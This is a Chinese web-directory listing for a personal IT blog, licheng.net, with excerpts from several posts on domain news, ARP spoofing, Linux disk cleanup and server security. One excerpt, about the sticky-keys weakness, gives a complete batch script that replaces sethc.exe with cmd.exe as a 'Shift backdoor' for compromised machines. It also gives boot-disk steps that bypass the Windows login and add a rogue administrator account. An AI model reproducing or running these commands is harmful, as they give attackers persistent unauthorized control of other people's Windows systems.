李程博客-晨曦载曜,万物咸覩;破晓而出,御风而行 www.licheng.net

李程博客-晨曦载曜,万物咸覩;破晓而出,御风而行

站名: 李程博客-晨曦载曜,万物咸覩;破晓而出,御风而行

网址: http://www.licheng.net

目录: 电脑网络 > 网络资源

PR:

Alexa: 6,084,464

备案号:

服务器IP: 173.252.204.163   美国 加利福尼亚州圣克拉拉县圣克拉拉市Take2 Hosting有限公司

描述: 晨曦在线,李程微博,这里是李程的个人博客!提供最新的IT资讯及服务器安全技术! By:晨曦旋风

查询: [ 网站综合查询 | PR查询 | Alexa排名 | 同IP网站 ]

详细介绍

李程博客晨曦载曜,万物咸覩;破晓而出,御风而行 - 晨曦旋风首页日志新闻技术文章Linux学习网络资源健康饮食影相记录留言板音乐预览模式: 普通 | 列表〓 晨曦博客正式更名,启用Licheng.Net 〓作者:晨曦旋风 日期:2010-04-07即日起,“晨曦博客”正式更名为“李程博客”!时隔多年,Licheng.net 终于归我所有!同时,原域名 3018.com 和 chen-xi.cn 暂时保留访问,已做转向规则。说起 licheng.net 这域名,据查询,03年有做站记录,国内注册的,06年底没续费,于07年1月14日被删除,立即被enom抢注,一个老外预定走了。当时在上大学,苦于没有美元信用卡,无法在国外预定。<...分类:日志新闻 | 固定链接 |评论: 3| 引用: 0 | 查看次数: 4110详谈SQL的安全设置作者:晨曦旋风 日期:2009-04-0607年时候,我在博客里写过关于SQL的安全,是从运行用户的角度考虑,设置安全权限,以防止被普通用户通过备份指令上传木马。。。详情参看原文(http://www.3018.com/article.asp?id=40)这几天闲来无事,所以打算详细谈谈SQL的安全。首先从黑客最基本的SQL入侵常用的xp_cmdshell扩展存储说起。以前没提这个,也是因为本人也常用这个扩展存储在肉鸡上提权,今天就详细的写出来吧。&...分类:技术文章 | 固定链接 |评论: 2| 引用: 0 | 查看次数: 5275实战shift连按5次,粘滞键的漏洞作者:晨曦旋风 日期:2008-06-16最近刚接手管理的公司一台服务器,三天两头发现被提权入侵,好郁闷...开始接手时,我就立即设置了各种权限,自认为没什么安全漏洞了.但时隔几天,就能发现administrators组多了用户...今天又发现sqlDebugger被提权为管理员了,害我花大量时间去查SQL是否有注入点.呵呵,,废话多了...进入原题,后来是偶然的发现是被人利用了系统粘滞键漏洞.至于粘滞键大家都不陌生,只要连按5下shift键,就会被调用出来. 好,问题就在这了!!也可以说是微软系统的一个安全漏洞吧,因为不仅仅是开机桌面状态下连按5下shift键,就是远程连接的时候,没输用户和密码,也可以连按5下shift键调用粘滞键功能....说到这,可能大家能想到了..只要将系统默认的粘滞键所调用文件替换掉其他文件,比如说换成cmd.exe 这样就可以任意执行命令了!! 如果我们抓到一台肉鸡,按照上述方法,即使提权的管理员用户被删,我们也可以远程空连,然后连续按5下shift键,就能调用出命令提示行,接下来又可以创建个管理员....后果可想而知....下面,我给出个批处理命令,是将cmd.exe替换到粘滞键所调用的sethc.exe文件:@echo off clsecho ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~echo.echo Shift后门echo 晨曦博客 http://www.chen-xi.cnecho 使用方法:本文件执行完毕后,echo 在终端界面按Shift 5次即可登陆系统! echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~del /q %systemroot%\system32\dllcache\sethc.exe del /q %systemroot%\system32\sethc.exe copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe将以上另存为 shift.bat 并运行它,系统里的 sethc.exe 就被换成了改了名的 cmd.exe了! 到这我就不多说了,明白人就知道如何利用这个漏洞!~另外按照以上思路,用连按5次shift键也可以破解windows的登录密码了..首先用DOS盘启动.转到c:\windows\system32\下面.输入如下命令:
copy sethc.exe sethc2.exe 备份粘滞键文件
copy cmd.exe sethc.exe 用cmd.exe覆盖sethc.exe
然后重启机器.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入:
net user admin admin /add 添加admin用户,密码是admin
net localgroup administrators admin /add 提升admin为管理员
分类:技术文章 | 固定链接 |
评论: 1

| 引用: 0 | 查看次数: 7972
关于ARP欺骗原理及防范
作者:晨曦旋风 日期:2007-04-13
本文由本人原创,授权发布站点:
中国站长站:http://www.chinaz.com/Server/Safe/0414E192007.html
最近不少朋友及客户的服务器遇到arp欺骗攻击,造成站点被挂木马.
由于是采用ARP技术欺骗,所以主机并没入侵,在服务器里查看网页源码也
是没任何挂马代码,但是网站在访问时候却全部被挂马!

开始我也不懂这就是网络传说中的ARP欺骗,后来查了下资料才知道这
就...
分类:技术文章 | 固定链接 |
评论: 1

| 引用: 0 | 查看次数: 5851
linux下清理删除日志文件
作者:晨曦旋风 日期:2013-05-08
今天上午,接到几个客户电话,一台XenServer系统的服务器出现故障,导致母机里的VM虚拟机无法启动。
然后通过机房提供的Serial Console,登录提示如下信息:
Bringing up management interface xenbr0: close failed: [Errno 28] No space left on device
[FAILED]
Bringing up additional interface xenbr1: close failed: [Errno 28] No space left on device
[FAILED]
...
分类:技术文章 | 固定链接 |
评论: 0

| 引用: 0 | 查看次数: 330
解决Iphone在windows 2003系统下无法自动连接手机相册
作者:晨曦旋风 日期:2012-11-26
最近外出,为了方便程序调试,带的笔记本是windows 2003系统的。
今天出去游玩,手机拍了一些照片,晚上回来发现ihpone 4s 在windows 2

猜你喜欢